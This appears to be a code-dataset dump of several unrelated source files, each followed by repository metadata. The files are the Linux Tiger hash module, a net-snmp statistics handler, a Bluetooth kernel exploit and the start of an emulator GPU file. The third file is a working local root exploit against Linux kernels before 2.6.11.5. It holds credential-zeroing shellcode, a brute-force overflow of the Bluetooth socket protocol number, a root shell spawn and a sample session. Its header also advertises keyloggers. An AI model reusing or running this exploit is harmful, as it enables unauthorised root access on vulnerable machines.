0xb9c97d43e9798fb4ULL, 0xa2f2d784740c28a3ULL, 0x7b8496476197566fULL,
0x7a5be3e6b65f069dULL, 0xf96330ed78be6f10ULL, 0xeee60de77a076a15ULL,
0x2b4bee4aa08b9bd0ULL, 0x6a56a63ec7b8894eULL, 0x02121359ba34fef4ULL,
0x4cbf99f8283703fcULL, 0x398071350caf30c8ULL, 0xd0a77a89f017687aULL,
0xf1c1a9eb9e423569ULL, 0x8c7976282dee8199ULL, 0x5d1737a5dd1f7abdULL,
0x4f53433c09a9fa80ULL, 0xfa8b0c53df7ca1d9ULL, 0x3fd9dcbc886ccb77ULL,
0xc040917ca91b4720ULL, 0x7dd00142f9d1dcdfULL, 0x8476fc1d4f387b58ULL,
0x23f8e7c5f3316503ULL, 0x032a2244e7e37339ULL, 0x5c87a5d750f5a74bULL,
0x082b4cc43698992eULL, 0xdf917becb858f63cULL, 0x3270b8fc5bf86ddaULL,
0x10ae72bb29b5dd76ULL, 0x576ac94e7700362bULL, 0x1ad112dac61efb8fULL,
0x691bc30ec5faa427ULL, 0xff246311cc327143ULL, 0x3142368e30e53206ULL,
0x71380e31e02ca396ULL, 0x958d5c960aad76f1ULL, 0xf8d6f430c16da536ULL,
0xc8ffd13f1be7e1d2ULL, 0x7578ae66004ddbe1ULL, 0x05833f01067be646ULL,
0xbb34b5ad3bfe586dULL, 0x095f34c9a12b97f0ULL, 0x247ab64525d60ca8ULL,
0xdcdbc6f3017477d1ULL, 0x4a2e14d4decad24dULL, 0xbdb5e6d9be0a1eebULL,
0x2a7e70f7794301abULL, 0xdef42d8a270540fdULL, 0x01078ec0a34c22c1ULL,
0xe5de511af4c16387ULL, 0x7ebb3a52bd9a330aULL, 0x77697857aa7d6435ULL,
0x004e831603ae4c32ULL, 0xe7a21020ad78e312ULL, 0x9d41a70c6ab420f2ULL,
0x28e06c18ea1141e6ULL, 0xd2b28cbd984f6b28ULL, 0x26b75f6c446e9d83ULL,
0xba47568c4d418d7fULL, 0xd80badbfe6183d8eULL, 0x0e206d7f5f166044ULL,
0xe258a43911cbca3eULL, 0x723a1746b21dc0bcULL, 0xc7caa854f5d7cdd3ULL,
0x7cac32883d261d9cULL, 0x7690c26423ba942cULL, 0x17e55524478042b8ULL,
0xe0be477656a2389fULL, 0x4d289b5e67ab2da0ULL, 0x44862b9c8fbbfd31ULL,
0xb47cc8049d141365ULL, 0x822c1b362b91c793ULL, 0x4eb14655fb13dfd8ULL,
0x1ecbba0714e2a97bULL, 0x6143459d5cde5f14ULL, 0x53a8fbf1d5f0ac89ULL,
0x97ea04d81c5e5b00ULL, 0x622181a8d4fdb3f3ULL, 0xe9bcd341572a1208ULL,
0x1411258643cce58aULL, 0x9144c5fea4c6e0a4ULL, 0x0d33d06565cf620fULL,
0x54a48d489f219ca1ULL, 0xc43e5eac6d63c821ULL, 0xa9728b3a72770dafULL,
0xd7934e7b20df87efULL, 0xe35503b61a3e86e5ULL, 0xcae321fbc819d504ULL,
0x129a50b3ac60bfa6ULL, 0xcd5e68ea7e9fb6c3ULL, 0xb01c90199483b1c7ULL,
0x3de93cd5c295376cULL, 0xaed52edf2ab9ad13ULL, 0x2e60f512c0a07884ULL,
0xbc3d86a3e36210c9ULL, 0x35269d9b163951ceULL, 0x0c7d6e2ad0cdb5faULL,
0x59e86297d87f5733ULL, 0x298ef221898db0e7ULL, 0x55000029d1a5aa7eULL,
0x8bc08ae1b5061b45ULL, 0xc2c31c2b6c92703aULL, 0x94cc596baf25ef42ULL,
0x0a1d73db22540456ULL, 0x04b6a0f9d9c4179aULL, 0xeffdafa2ae3d3c60ULL,
0xf7c8075bb49496c4ULL, 0x9cc5c7141d1cd4e3ULL, 0x78bd1638218e5534ULL,
0xb2f11568f850246aULL, 0xedfabcfa9502bc29ULL, 0x796ce5f2da23051bULL,
0xaae128b0dc93537cULL, 0x3a493da0ee4b29aeULL, 0xb5df6b2c416895d7ULL,
0xfcabbd25122d7f37ULL, 0x70810b58105dc4b1ULL, 0xe10fdd37f7882a90ULL,
0x524dcab5518a3f5cULL, 0x3c9e85878451255bULL, 0x4029828119bd34e2ULL,
0x74a05b6f5d3ceccbULL, 0xb610021542e13ecaULL, 0x0ff979d12f59e2acULL,
0x6037da27e4f9cc50ULL, 0x5e92975a0df1847dULL, 0xd66de190d3e623feULL,
0x5032d6b87b568048ULL, 0x9a36b7ce8235216eULL, 0x80272a7a24f64b4aULL,
0x93efed8b8c6916f7ULL, 0x37ddbff44cce1555ULL, 0x4b95db5d4b99bd25ULL,
0x92d3fda169812fc0ULL, 0xfb1a4a9a90660bb6ULL, 0x730c196946a4b9b2ULL,
0x81e289aa7f49da68ULL, 0x64669a0f83b1a05fULL, 0x27b3ff7d9644f48bULL,
0xcc6b615c8db675b3ULL, 0x674f20b9bcebbe95ULL, 0x6f31238275655982ULL,
0x5ae488713e45cf05ULL, 0xbf619f9954c21157ULL, 0xeabac46040a8eae9ULL,
0x454c6fe9f2c0c1cdULL, 0x419cf6496412691cULL, 0xd3dc3bef265b0f70ULL,
0x6d0e60f5c3578a9eULL
};
static const u64 sbox4[256] = {
0x5b0e608526323c55ULL, 0x1a46c1a9fa1b59f5ULL, 0xa9e245a17c4c8ffaULL,
0x65ca5159db2955d7ULL, 0x05db0a76ce35afc2ULL, 0x81eac77ea9113d45ULL,
0x528ef88ab6ac0a0dULL, 0xa09ea253597be3ffULL, 0x430ddfb3ac48cd56ULL,
0xc4b3a67af45ce46fULL, 0x4ececfd8fbe2d05eULL, 0x3ef56f10b39935f0ULL,
0x0b22d6829cd619c6ULL, 0x17fd460a74df2069ULL, 0x6cf8cc8e8510ed40ULL,
0xd6c824bf3a6ecaa7ULL, 0x61243d581a817049ULL, 0x048bacb6bbc163a2ULL,
0xd9a38ac27d44cc32ULL, 0x7fddff5baaf410abULL, 0xad6d495aa804824bULL,
0xe1a6a74f2d8c9f94ULL, 0xd4f7851235dee8e3ULL, 0xfd4b7f886540d893ULL,
0x247c20042aa4bfdaULL, 0x096ea1c517d1327cULL, 0xd56966b4361a6685ULL,
0x277da5c31221057dULL, 0x94d59893a43acff7ULL, 0x64f0c51ccdc02281ULL,
0x3d33bcc4ff6189dbULL, 0xe005cb184ce66af1ULL, 0xff5ccd1d1db99beaULL,
0xb0b854a7fe42980fULL, 0x7bd46a6a718d4b9fULL, 0xd10fa8cc22a5fd8cULL,
0xd31484952be4bd31ULL, 0xc7fa975fcb243847ULL, 0x4886ed1e5846c407ULL,
0x28cddb791eb70b04ULL, 0xc2b00be2f573417fULL, 0x5c9590452180f877ULL,
0x7a6bddfff370eb00ULL, 0xce509e38d6d9d6a4ULL, 0xebeb0f00647fa702ULL,
0x1dcc06cf76606f06ULL, 0xe4d9f28ba286ff0aULL, 0xd85a305dc918c262ULL,
0x475b1d8732225f54ULL, 0x2d4fb51668ccb5feULL, 0xa679b9d9d72bba20ULL,
0x53841c0d912d43a5ULL, 0x3b7eaa48bf12a4e8ULL, 0x781e0e47f22f1ddfULL,
0xeff20ce60ab50973ULL, 0x20d261d19dffb742ULL, 0x16a12b03062a2e39ULL,
0x1960eb2239650495ULL, 0x251c16fed50eb8b8ULL, 0x9ac0c330f826016eULL,
0xed152665953e7671ULL, 0x02d63194a6369570ULL, 0x5074f08394b1c987ULL,
0x70ba598c90b25ce1ULL, 0x794a15810b9742f6ULL, 0x0d5925e9fcaf8c6cULL,
0x3067716cd868744eULL, 0x910ab077e8d7731bULL, 0x6a61bbdb5ac42f61ULL,
0x93513efbf0851567ULL, 0xf494724b9e83e9d5ULL, 0xe887e1985c09648dULL,
0x34b1d3c675370cfdULL, 0xdc35e433bc0d255dULL, 0xd0aab84234131be0ULL,
0x08042a50b48b7eafULL, 0x9997c4ee44a3ab35ULL, 0x829a7b49201799d0ULL,
0x263b8307b7c54441ULL, 0x752f95f4fd6a6ca6ULL, 0x927217402c08c6e5ULL,
0x2a8ab754a795d9eeULL, 0xa442f7552f72943dULL, 0x2c31334e19781208ULL,
0x4fa98d7ceaee6291ULL, 0x55c3862f665db309ULL, 0xbd0610175d53b1f3ULL,
0x46fe6cb840413f27ULL, 0x3fe03792df0cfa59ULL, 0xcfe700372eb85e8fULL,
0xa7be29e7adbce118ULL, 0xe544ee5cde8431ddULL, 0x8a781b1b41f1873eULL,
0xa5c94c78a0d2f0e7ULL, 0x39412e2877b60728ULL, 0xa1265ef3afc9a62cULL,
0xbcc2770c6a2506c5ULL, 0x3ab66dd5dce1ce12ULL, 0xe65499d04a675b37ULL,
0x7d8f523481bfd216ULL, 0x0f6f64fcec15f389ULL, 0x74efbe618b5b13c8ULL,
0xacdc82b714273e1dULL, 0xdd40bfe003199d17ULL, 0x37e99257e7e061f8ULL,
0xfa52626904775aaaULL, 0x8bbbf63a463d56f9ULL, 0xf0013f1543a26e64ULL,
0xa8307e9f879ec898ULL, 0xcc4c27a4150177ccULL, 0x1b432f2cca1d3348ULL,
0xde1d1f8f9f6fa013ULL, 0x606602a047a7ddd6ULL, 0xd237ab64cc1cb2c7ULL,
0x9b938e7225fcd1d3ULL, 0xec4e03708e0ff476ULL, 0xfeb2fbda3d03c12dULL,
0xae0bced2ee43889aULL, 0x22cb8923ebfb4f43ULL, 0x69360d013cf7396dULL,
0x855e3602d2d4e022ULL, 0x073805bad01f784cULL, 0x33e17a133852f546ULL,
0xdf4874058ac7b638ULL, 0xba92b29c678aa14aULL, 0x0ce89fc76cfaadcdULL,
0x5f9d4e0908339e34ULL, 0xf1afe9291f5923b9ULL, 0x6e3480f60f4a265fULL,
0xeebf3a2ab29b841cULL, 0xe21938a88f91b4adULL, 0x57dfeff845c6d3c3ULL,
0x2f006b0bf62caaf2ULL, 0x62f479ef6f75ee78ULL, 0x11a55ad41c8916a9ULL,
0xf229d29084fed453ULL, 0x42f1c27b16b000e6ULL, 0x2b1f76749823c074ULL,
0x4b76eca3c2745360ULL, 0x8c98f463b91691bdULL, 0x14bcc93cf1ade66aULL,
0x8885213e6d458397ULL, 0x8e177df0274d4711ULL, 0xb49b73b5503f2951ULL,
0x10168168c3f96b6bULL, 0x0e3d963b63cab0aeULL, 0x8dfc4b5655a1db14ULL,
0xf789f1356e14de5cULL, 0x683e68af4e51dac1ULL, 0xc9a84f9d8d4b0fd9ULL,
0x3691e03f52a0f9d1ULL, 0x5ed86e46e1878e80ULL, 0x3c711a0e99d07150ULL,
0x5a0865b20c4e9310ULL, 0x56fbfc1fe4f0682eULL, 0xea8d5de3105edf9bULL,
0x71abfdb12379187aULL, 0x2eb99de1bee77b9cULL, 0x21ecc0ea33cf4523ULL,
0x59a4d7521805c7a1ULL, 0x3896f5eb56ae7c72ULL, 0xaa638f3db18f75dcULL,
0x9f39358dabe9808eULL, 0xb7defa91c00b72acULL, 0x6b5541fd62492d92ULL,
0x6dc6dee8f92e4d5bULL, 0x353f57abc4beea7eULL, 0x735769d6da5690ceULL,
0x0a234aa642391484ULL, 0xf6f9508028f80d9dULL, 0xb8e319a27ab3f215ULL,
0x31ad9c1151341a4dULL, 0x773c22a57bef5805ULL, 0x45c7561a07968633ULL,
0xf913da9e249dbe36ULL, 0xda652d9b78a64c68ULL, 0x4c27a97f3bc334efULL,
0x76621220e66b17f4ULL, 0x967743899acd7d0bULL, 0xf3ee5bcae0ed6782ULL,
0x409f753600c879fcULL, 0x06d09a39b5926db6ULL, 0x6f83aeb0317ac588ULL,
0x01e6ca4a86381f21ULL, 0x66ff3462d19f3025ULL, 0x72207c24ddfd3bfbULL,
0x4af6b6d3e2ece2ebULL, 0x9c994dbec7ea08deULL, 0x49ace597b09a8bc4ULL,
0xb38c4766cf0797baULL, 0x131b9373c57c2a75ULL, 0xb1822cce61931e58ULL,
0x9d7555b909ba1c0cULL, 0x127fafdd937d11d2ULL, 0x29da3badc66d92e4ULL,
0xa2c1d57154c2ecbcULL, 0x58c5134d82f6fe24ULL, 0x1c3ae3515b62274fULL,
0xe907c82e01cb8126ULL, 0xf8ed091913e37fcbULL, 0x3249d8f9c80046c9ULL,
0x80cf9bede388fb63ULL, 0x1881539a116cf19eULL, 0x5103f3f76bd52457ULL,
0x15b7e6f5ae47f7a8ULL, 0xdbd7c6ded47e9ccfULL, 0x44e55c410228bb1aULL,
0xb647d4255edb4e99ULL, 0x5d11882bb8aafc30ULL, 0xf5098bbb29d3212aULL,
0x8fb5ea14e90296b3ULL, 0x677b942157dd025aULL, 0xfb58e7c0a390acb5ULL,
0x89d3674c83bd4a01ULL, 0x9e2da4df4bf3b93bULL, 0xfcc41e328cab4829ULL,
0x03f38c96ba582c52ULL, 0xcad1bdbd7fd85db2ULL, 0xbbb442c16082ae83ULL,
0xb95fe86ba5da9ab0ULL, 0xb22e04673771a93fULL, 0x845358c9493152d8ULL,
0xbe2a488697b4541eULL, 0x95a2dc2dd38e6966ULL, 0xc02c11ac923c852bULL,
0x2388b1990df2a87bULL, 0x7c8008fa1b4f37beULL, 0x1f70d0c84d54e503ULL,
0x5490adec7ece57d4ULL, 0x002b3c27d9063a3aULL, 0x7eaea3848030a2bfULL,
0xc602326ded2003c0ULL, 0x83a7287d69a94086ULL, 0xc57a5fcb30f57a8aULL,
0xb56844e479ebe779ULL, 0xa373b40f05dcbce9ULL, 0xd71a786e88570ee2ULL,
0x879cbacdbde8f6a0ULL, 0x976ad1bcc164a32fULL, 0xab21e25e9666d78bULL,
0x901063aae5e5c33cULL, 0x9818b34448698d90ULL, 0xe36487ae3e1e8abbULL,
0xafbdf931893bdcb4ULL, 0x6345a0dc5fbbd519ULL, 0x8628fe269b9465caULL,
0x1e5d01603f9c51ecULL, 0x4de44006a15049b7ULL, 0xbf6c70e5f776cbb1ULL,
0x411218f2ef552bedULL, 0xcb0c0708705a36a3ULL, 0xe74d14754f986044ULL,
0xcd56d9430ea8280eULL, 0xc12591d7535f5065ULL, 0xc83223f1720aef96ULL,
0xc3a0396f7363a51fULL
};
static void tgr192_round(u64 * ra, u64 * rb, u64 * rc, u64 x, int mul)
{
u64 a = *ra;
u64 b = *rb;
u64 c = *rc;
c ^= x;
a -= sbox1[c & 0xff] ^ sbox2[(c >> 16) & 0xff]
^ sbox3[(c >> 32) & 0xff] ^ sbox4[(c >> 48) & 0xff];
b += sbox4[(c >> 8) & 0xff] ^ sbox3[(c >> 24) & 0xff]
^ sbox2[(c >> 40) & 0xff] ^ sbox1[(c >> 56) & 0xff];
b *= mul;
*ra = a;
*rb = b;
*rc = c;
}
static void tgr192_pass(u64 * ra, u64 * rb, u64 * rc, u64 * x, int mul)
{
u64 a = *ra;
u64 b = *rb;
u64 c = *rc;
tgr192_round(&a, &b, &c, x[0], mul);
tgr192_round(&b, &c, &a, x[1], mul);
tgr192_round(&c, &a, &b, x[2], mul);
tgr192_round(&a, &b, &c, x[3], mul);
tgr192_round(&b, &c, &a, x[4], mul);
tgr192_round(&c, &a, &b, x[5], mul);
tgr192_round(&a, &b, &c, x[6], mul);
tgr192_round(&b, &c, &a, x[7], mul);
*ra = a;
*rb = b;
*rc = c;
}
static void tgr192_key_schedule(u64 * x)
{
x[0] -= x[7] ^ 0xa5a5a5a5a5a5a5a5ULL;
x[1] ^= x[0];
x[2] += x[1];
x[3] -= x[2] ^ ((~x[1]) << 19);
x[4] ^= x[3];
x[5] += x[4];
x[6] -= x[5] ^ ((~x[4]) >> 23);
x[7] ^= x[6];
x[0] += x[7];
x[1] -= x[0] ^ ((~x[7]) << 19);
x[2] ^= x[1];
x[3] += x[2];
x[4] -= x[3] ^ ((~x[2]) >> 23);
x[5] ^= x[4];
x[6] += x[5];
x[7] -= x[6] ^ 0x0123456789abcdefULL;
}
/****************
* Transform the message DATA which consists of 512 bytes (8 words)
*/
static void tgr192_transform(struct tgr192_ctx *tctx, const u8 * data)
{
u64 a, b, c, aa, bb, cc;
u64 x[8];
int i;
const __le64 *ptr = (const __le64 *)data;
for (i = 0; i < 8; i++)
x[i] = le64_to_cpu(ptr[i]);
/* save */
a = aa = tctx->a;
b = bb = tctx->b;
c = cc = tctx->c;
tgr192_pass(&a, &b, &c, x, 5);
tgr192_key_schedule(x);
tgr192_pass(&c, &a, &b, x, 7);
tgr192_key_schedule(x);
tgr192_pass(&b, &c, &a, x, 9);
/* feedforward */
a ^= aa;
b -= bb;
c += cc;
/* store */
tctx->a = a;
tctx->b = b;
tctx->c = c;
}
static int tgr192_init(struct shash_desc *desc)
{
struct tgr192_ctx *tctx = shash_desc_ctx(desc);
tctx->a = 0x0123456789abcdefULL;
tctx->b = 0xfedcba9876543210ULL;
tctx->c = 0xf096a5b4c3b2e187ULL;
tctx->nblocks = 0;
tctx->count = 0;
return 0;
}
/* Update the message digest with the contents
* of INBUF with length INLEN. */
static int tgr192_update(struct shash_desc *desc, const u8 *inbuf,
unsigned int len)
{
struct tgr192_ctx *tctx = shash_desc_ctx(desc);
if (tctx->count == 64) { /* flush the buffer */
tgr192_transform(tctx, tctx->hash);
tctx->count = 0;
tctx->nblocks++;
}
if (!inbuf) {
return 0;
}
if (tctx->count) {
for (; len && tctx->count < 64; len--) {
tctx->hash[tctx->count++] = *inbuf++;
}
tgr192_update(desc, NULL, 0);
if (!len) {
return 0;
}
}
while (len >= 64) {
tgr192_transform(tctx, inbuf);
tctx->count = 0;
tctx->nblocks++;
len -= 64;
inbuf += 64;
}
for (; len && tctx->count < 64; len--) {
tctx->hash[tctx->count++] = *inbuf++;
}
return 0;
}
/* The routine terminates the computation */
static int tgr192_final(struct shash_desc *desc, u8 * out)
{
struct tgr192_ctx *tctx = shash_desc_ctx(desc);
__be64 *dst = (__be64 *)out;
__be64 *be64p;
__le32 *le32p;
u32 t, msb, lsb;
tgr192_update(desc, NULL, 0); /* flush */ ;
msb = 0;
t = tctx->nblocks;
if ((lsb = t << 6) < t) { /* multiply by 64 to make a byte count */
msb++;
}
msb += t >> 26;
t = lsb;
if ((lsb = t + tctx->count) < t) { /* add the count */
msb++;
}
t = lsb;
if ((lsb = t << 3) < t) { /* multiply by 8 to make a bit count */
msb++;
}
msb += t >> 29;
if (tctx->count < 56) { /* enough room */
tctx->hash[tctx->count++] = 0x01; /* pad */
while (tctx->count < 56) {
tctx->hash[tctx->count++] = 0; /* pad */
}
} else { /* need one extra block */
tctx->hash[tctx->count++] = 0x01; /* pad character */
while (tctx->count < 64) {
tctx->hash[tctx->count++] = 0;
}
tgr192_update(desc, NULL, 0); /* flush */ ;
memset(tctx->hash, 0, 56); /* fill next block with zeroes */
}
/* append the 64 bit count */
le32p = (__le32 *)&tctx->hash[56];
le32p[0] = cpu_to_le32(lsb);
le32p[1] = cpu_to_le32(msb);
tgr192_transform(tctx, tctx->hash);
be64p = (__be64 *)tctx->hash;
dst[0] = be64p[0] = cpu_to_be64(tctx->a);
dst[1] = be64p[1] = cpu_to_be64(tctx->b);
dst[2] = be64p[2] = cpu_to_be64(tctx->c);
return 0;
}
static int tgr160_final(struct shash_desc *desc, u8 * out)
{
u8 D[64];
tgr192_final(desc, D);
memcpy(out, D, TGR160_DIGEST_SIZE);
memzero_explicit(D, TGR192_DIGEST_SIZE);
return 0;
}
static int tgr128_final(struct shash_desc *desc, u8 * out)
{
u8 D[64];
tgr192_final(desc, D);
memcpy(out, D, TGR128_DIGEST_SIZE);
memzero_explicit(D, TGR192_DIGEST_SIZE);
return 0;
}
static struct shash_alg tgr192 = {
.digestsize = TGR192_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr192_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr192",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
static struct shash_alg tgr160 = {
.digestsize = TGR160_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr160_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr160",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
static struct shash_alg tgr128 = {
.digestsize = TGR128_DIGEST_SIZE,
.init = tgr192_init,
.update = tgr192_update,
.final = tgr128_final,
.descsize = sizeof(struct tgr192_ctx),
.base = {
.cra_name = "tgr128",
.cra_flags = CRYPTO_ALG_TYPE_SHASH,
.cra_blocksize = TGR192_BLOCK_SIZE,
.cra_module = THIS_MODULE,
}
};
static int __init tgr192_mod_init(void)
{
int ret = 0;
ret = crypto_register_shash(&tgr192);
if (ret < 0) {
goto out;
}
ret = crypto_register_shash(&tgr160);
if (ret < 0) {
crypto_unregister_shash(&tgr192);
goto out;
}
ret = crypto_register_shash(&tgr128);
if (ret < 0) {
crypto_unregister_shash(&tgr192);
crypto_unregister_shash(&tgr160);
}
out:
return ret;
}
static void __exit tgr192_mod_fini(void)
{
crypto_unregister_shash(&tgr192);
crypto_unregister_shash(&tgr160);
crypto_unregister_shash(&tgr128);
}
MODULE_ALIAS("tgr160");
MODULE_ALIAS("tgr128");
module_init(tgr192_mod_init);
module_exit(tgr192_mod_fini);
MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Tiger Message Digest Algorithm");
| gpl-2.0 |
robacklin/uclinux-users | net-snmp/agent/mibgroup/snmpv3/snmpMPDStats.c | 4 | 2063 | /*
* snmpMPDStats.c: tallies errors for SNMPv3 message processing.
*/
#include <net-snmp/net-snmp-config.h>
#if HAVE_WINSOCK_H
#include <winsock.h>
#endif
#include <net-snmp/net-snmp-includes.h>
#include <net-snmp/agent/net-snmp-agent-includes.h>
#include <net-snmp/agent/sysORTable.h>
#include "snmpMPDStats.h"
#include "util_funcs/header_generic.h"
struct variable2 snmpMPDStats_variables[] = {
{SNMPUNKNOWNSECURITYMODELS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {1}},
{SNMPINVALIDMSGS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {2}},
{SNMPUNKNOWNPDUHANDLERS, ASN_COUNTER, NETSNMP_OLDAPI_RONLY,
var_snmpMPDStats, 1, {3}},
};
/*
* now load this mib into the agents mib table
*/
oid snmpMPDStats_variables_oid[] =
{ 1, 3, 6, 1, 6, 3, 11, 2, 1 };
void
init_snmpMPDStats(void)
{
static oid reg[] = { 1, 3, 6, 1, 6, 3, 11, 3, 1, 1 };
REGISTER_SYSOR_ENTRY(reg,
"The MIB for Message Processing and Dispatching.");
REGISTER_MIB("snmpv3/snmpMPDStats", snmpMPDStats_variables, variable2,
snmpMPDStats_variables_oid);
}
u_char *
var_snmpMPDStats(struct variable *vp,
oid * name,
size_t * length,
int exact, size_t * var_len, WriteMethod ** write_method)
{
/*
* variables we may use later
*/
static long long_ret;
int tmagic;
*write_method = 0; /* assume it isnt writable for the time being */
*var_len = sizeof(long_ret); /* assume an integer and change later if not */
if (header_generic(vp, name, length, exact, var_len, write_method))
return 0;
/*
* this is where we do the value assignments for the mib results.
*/
tmagic = vp->magic;
if ((tmagic >= 0)
&& (tmagic <= (STAT_MPD_STATS_END - STAT_MPD_STATS_START))) {
long_ret = snmp_get_statistic(tmagic + STAT_MPD_STATS_START);
return (unsigned char *) &long_ret;
}
return 0;
}
| gpl-2.0 |
balle/bluediving | tools/backdoored-bluetooth.c | 4 | 4574 | /* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
*
* 19 October 2005
http://backdoored.net
Visit us for Undetected keyloggers and packers.Thanx
h4x0r bluetooth $ id
uid=1000(addicted) gid=100(users) groups=100(users)
h4x0r bluetooth $
h4x0r bluetooth $ ./backdoored-bluetooth
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
Checking the Effective user id after overflow : UID = 0
h4x0r bluetooth # id
uid=0(root) gid=0(root) groups=100(users)
h4x0r bluetooth #
h4x0r bluetooth # dmesg
PREEMPT SMP
Modules linked in:
CPU: 0
EIP: 0060:[<c0405ead>] Not tainted VLI
EFLAGS: 00010286 (2.6.9)
EIP is at bt_sock_create+0x3d/0x130
eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0
esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c
ds: 007b es: 007b ss: 0068
Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000 task=c6728a20)
Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680 ffebfe34
00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34
c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80
Call Trace:
[<c039a3bb>] __sock_create+0xfb/0x2a0
[<c039a58d>] sock_create+0x2d/0x40
[<c039a60b>] sys_socket+0x2b/0x60
[<c039b4e8>] sys_socketcall+0x68/0x260
[<c0117a9c>] finish_task_switch+0x3c/0x90
[<c0117b07>] schedule_tail+0x17/0x50
[<c0115410>] do_page_fault+0x0/0x5e9
[<c01031af>] syscall_call+0x7/0xb
Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0 85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00 <8b> 50 10 bf 01 00 00 00
85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <unistd.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000
#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff
#define KERNEL_SPACE_BUFFER 0x100000
char asmcode[] = /*Global shellcode*/
"\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a"
"\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b"
"\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90"
"\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3";
struct net_proto_family {
int family;
int (*create) (int *sock, int protocol);
short authentication;
short encryption;
short encrypt_net;
int *owner;
};
int check_zombie_child(int status,pid_t pid)
{
waitpid(pid,&status,0);
if(WIFEXITED(status))
{
if(WEXITSTATUS(status) != 0xFF)
exit(-1);
}
else if (WIFSIGNALED(status))
{
printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status)));
return(WTERMSIG(status));
}
}
int brute_socket_create (int negative_proto_number)
{
socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */
int i;
i = geteuid();
printf("Checking the Effective user id after overflow : UID = %d\n",i);
if(i)
exit(EXIT_FAILURE);
printf("0wnage D0ne bro.\n");
execl("/bin/sh","sh",NULL);
exit(EXIT_SUCCESS);
}
int main(void)
{
pid_t pid;
int counter;
int status;
int *kernel_return;
char kernel_buffer[KERNEL_SPACE_BUFFER];
unsigned int brute_start;
unsigned int where_kernel;
struct net_proto_family *bluetooth;
bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family));
bzero(bluetooth,sizeof(struct net_proto_family));
bluetooth->family = AF_BLUETOOTH;
bluetooth->authentication = 0x0; /* No Authentication */
bluetooth->encryption = 0x0; /* No Encryption */
bluetooth->encrypt_net = 0x0; /* No Encrypt_net */
bluetooth->owner = 0x0; /* No fucking owner */
bluetooth->create = (int *) asmcode;
kernel_return = (int *) kernel_buffer;
for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++)
*kernel_return = (int)bluetooth;
brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
printf("Bluetooth stack local root exploit\n");
printf("http://backdoored/net");
while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
{
where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
where_kernel = -where_kernel;
pid = fork();
if(pid == 0 )
brute_socket_create(where_kernel);
check_zombie_child(status,pid);
brute_start += KERNEL_SPACE_BUFFER;
fflush(stdout);
}
return 0;
}
| gpl-2.0 |
jduranmaster/ppsspp | GPU/GPUCommon.cpp | 4 | 33951 | #include <algorithm>
#include "base/mutex.h"
#include "base/timeutil.h"
#include "Common/ColorConv.h"
#include "GPU/GeDisasm.h"
#include "GPU/GPU.h"
#include "GPU/GPUCommon.h"
#include "GPU/GPUState.h"
#include "ChunkFile.h"
#include "Core/Config.h"
#include "Core/CoreTiming.h"
#include "Core/MemMap.h"
#include "Core/Host.h"
#include "Core/Reporting.h"
#include "Core/HLE/HLE.h"
#include "Core/HLE/sceKernelMemory.h"
#include "Core/HLE/sceKernelInterrupt.h"
#include "Core/HLE/sceKernelThread.h"
#include "Core/HLE/sceGe.h"
GPUCommon::GPUCommon() :
dumpNextFrame_(false),
dumpThisFrame_(false)
{
Reinitialize();
SetupColorConv();
SetThreadEnabled(g_Config.bSeparateCPUThread);
InitGfxState();
}
GPUCommon::~GPUCommon() {
ShutdownGfxState();
}
void GPUCommon::Reinitialize() {
easy_guard guard(listLock);
memset(dls, 0, sizeof(dls));
for (int i = 0; i < DisplayListMaxCount; ++i) {
dls[i].state = PSP_GE_DL_STATE_NONE;
dls[i].waitTicks = 0;
}
nextListID = 0;
currentList = NULL;
isbreak = false;
drawCompleteTicks = 0;
busyTicks = 0;
timeSpentStepping_ = 0.0;
interruptsEnabled_ = true;
UpdateTickEstimate(0);
}
void GPUCommon::PopDLQueue() {
easy_guard guard(listLock);
